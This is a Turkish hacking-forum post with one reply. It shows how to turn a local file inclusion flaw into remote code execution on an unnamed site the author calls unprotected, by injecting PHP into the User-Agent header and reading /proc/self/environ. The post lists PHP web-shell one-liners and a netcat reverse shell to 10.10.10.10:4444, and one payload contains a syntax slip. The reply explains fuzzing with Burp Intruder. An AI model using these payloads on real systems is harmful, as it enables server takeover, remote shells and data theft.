LFİ to RCE deneme

lyxG

Anka Team Junior
15 Ocak 2019
303
71
Merhaba, LFİ zafiyeti yanlış yapılandırılmış ve kontrol edilmeyen dosya çağırma sistemlerinden meydana geliyor. Test etmek için ../ gibi dizin çıkartma işlemleri kullanılabilir. Bunlarla beraber double url encodeing işlemleri veya sunucuyu yanıltmak için ....//....// gibi yollar tercih edilip null byte injection yöntemleri uygulanabilir.

Site üzerinde herhangi bir koruma mekanizması v.s yok bunun için işin içinde php:///filter gibi yöntemler katmadan /self/environ üzerinde bilgi çıkartacağım.


fuNoEj.png


Şimdi ise veri çıkartabileceğimiz noktaya değinelim, User-Agent: bilgisinde duran mozilla kısmını siliyorum bunun yerinde kendi php kodumu çalıştırıyorum. Bu sayede sistem içinde belki eval kullanarak belki ; shell_exec | shell | gibi php de kullanabileceğimiz verilerden rce alabiliriz.


zYzbod.png




Bunlarla beraber sistemde kod okuyabilir, yazabilir hatta reverse shell alabilirsiniz, eğer ki lfi methodunda expect:/// çalışıyorsa direk okuyabilirsiniz bunlarla beraber;

<?php system($_GET['c']); ?>

<?php system($_REQUEST['c']$); ?>

<?php $os = shell_exec('id'); echo "<pre>$os</pre>"; ?>

$os = shell_exec('nc 10.10.10.10 4444 -e /bin/bash'); ?>
 

lyxG

Anka Team Junior
15 Ocak 2019
303
71
Kullanılan program nedir ?
hocam ben burp suite kullanıyorum, bu sayede raw olarak mesajları görebiliyor ve render edebiliyorum. Eğer ki lfi testi yapmak istiyorsanız github üzerinden windows / linux makineler için payloadlar var requesti inturder kısmına aktarıp sniper modülü ile deneyebilirsiniz. Gelen server statüleri ve leng lere bakarak payloadların başarı durumlarını okuyabilirsiniz.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.